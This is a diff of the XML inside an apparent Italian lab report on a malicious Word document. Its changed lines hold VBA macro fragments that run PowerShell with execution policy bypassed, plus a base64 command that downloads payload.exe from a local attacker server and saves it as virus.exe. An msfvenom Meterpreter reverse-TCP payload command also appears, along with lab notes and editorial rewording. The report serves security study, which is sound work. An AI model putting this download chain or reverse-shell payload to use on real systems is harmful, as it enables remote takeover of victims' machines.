+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command "</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>v38d2edd4076bb66acc2ee1b42bdb2336 = "IEX([</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -2691,44 +2771,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>m758f0834b3c6499700addb9b25f64906.Run "powershell.exe -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoProfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ExecutionPolicy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Bypass -Command " &amp; vr4573k99768ffgruighfjkgbgvghjjhg, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>m758f0834b3c6499700addb9b25f64906.Run "powershell.exe -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoProfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ExecutionPolicy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Bypass -Command " &amp; ca9d601c97cef483411de079bb9a3419b, 0, True</w:t>
+        <w:t>m758f0834b3c6499700addb9b25f64906.Run jytfk6877hnhhjj89ong6rbgfghj66879 &amp; " &amp; " &amp; vr4573k99768ffgruighfjkgbgvghjjhg, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>m758f0834b3c6499700addb9b25f64906.Run jytfk6877hnhhjj89ong6rbgfghj66879 &amp; " &amp; " &amp; ca9d601c97cef483411de079bb9a3419b, 0, True</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2741,7 +2789,6 @@
         <w:t>End Sub</w:t>
       </w:r>
     </w:p>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titolo1"/>
@@ -2994,154 +3041,6 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t>//</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>creo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> il software </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>malevolo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>scaricare</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>nella</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>macchina</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>della</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>vittima</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfvenom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p windows/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> LHOST</w:t>
-      </w:r>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ipAttaccante</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> LPORT</w:t>
-      </w:r>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:t>porta -f exe &gt; payload.exe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>//</w:t>
       </w:r>
@@ -3150,6 +3049,154 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
+        <w:t>creo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il software </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>nella</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>macchina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>della</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>vittima</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LHOST</w:t>
+      </w:r>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ipAttaccante</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LPORT</w:t>
+      </w:r>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>porta -f exe &gt; payload.exe</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>//</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
         <w:t>metto</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -3414,7 +3461,10 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> (per </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">per </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3438,7 +3488,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>)</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -1919,7 +1919,13 @@
       <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>('" &amp; "http://192.168.43.209:8000/payload.exe" &amp; "', '" &amp; "C:\Users\crist\Downloads\virus.exe" &amp; "')")</w:t>
+        <w:t>('" &amp; "http://192.168.43.209:8000/payload.exe" &amp; "', '" &amp; "C:\Users\</w:t>
+      </w:r>
+      <w:r>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:r>
+        <w:t>\Downloads\virus.exe" &amp; "')")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1977,11 +1983,9 @@
       <w:r>
         <w:t xml:space="preserve">    codificato2 = EncodeBase64(" &amp; 'C:\Users\</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>crist</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>malware</w:t>
+      </w:r>
       <w:r>
         <w:t>\Downloads\virus.exe'")</w:t>
       </w:r>
@@ -2753,7 +2757,13 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vMTkyLjE2OC40My4yMDk6ODAwMC9wYXlsb2FkLmV4ZScsICdDOlxVc2Vyc1xjcmlzdFxEb3dubG9hZHNcdmlydXMuZXhlJyk=")</w:t>
+        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "</w:t>
+      </w:r>
+      <w:r>
+        <w:t>KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vMTkyLjE2OC40My4yMDk6ODAwMC9wYXlsb2FkLmV4ZScsICdDOlxVc2Vyc1xtYWx3YXJlXERvd25sb2Fkc1x2aXJ1cy5leGUnKQ==</w:t>
+      </w:r>
+      <w:r>
+        <w:t>")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3489,6 +3499,49 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Le due machine </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sono</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>connesse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ad </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>una</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> rete </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il cui </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>indirizzo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> è 192.168.43.0/24.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4818,6 +4871,27 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
+<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Documento" ma:contentTypeID="0x01010003AD22B01210FE489D9BE433888FACA9" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="09fad2276ea52fc6ec20be57fa2916a4">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xmlns:ns4="f1c65361-0737-4e30-bb3a-9e2ed6feafec" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2cd1dbdccf64e950842932f53b8e29c6" ns3:_="" ns4:_="">
     <xsd:import namespace="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
@@ -5058,28 +5132,33 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
 
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
 
-<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F74C8422-D422-4F67-B8D4-238A7F7173C7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -5096,30 +5175,4 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
 </file>
--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -211,6 +211,75 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mi </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>collego</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> al server </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>creato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> con python e </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scarico</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>comandoDaEseguire</w:t>
@@ -617,7 +686,10 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> state date </w:t>
+        <w:t xml:space="preserve"> state date</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -633,7 +705,16 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> come input del </w:t>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> come input </w:t>
+      </w:r>
+      <w:r>
+        <w:t>al</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -653,7 +734,7 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>fini</w:t>
+        <w:t>motivi</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -705,6 +786,9 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> per </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -766,11 +850,14 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Inizializza</w:t>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Codifica</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -781,30 +868,17 @@
         <w:t>stringhe</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>coi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>comandi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">2 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Codifica</w:t>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Decodifica</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -818,25 +892,10 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">3 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Decodifica</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> le </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>stringhe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">4 </w:t>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2044,11 +2103,7 @@
         <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">    </w:t>
@@ -2525,7 +2580,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> I due </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> due </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2608,7 +2671,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> I </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3471,6 +3542,9 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -3501,7 +3575,77 @@
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Le due machine </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>utilizzato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> la </w:t>
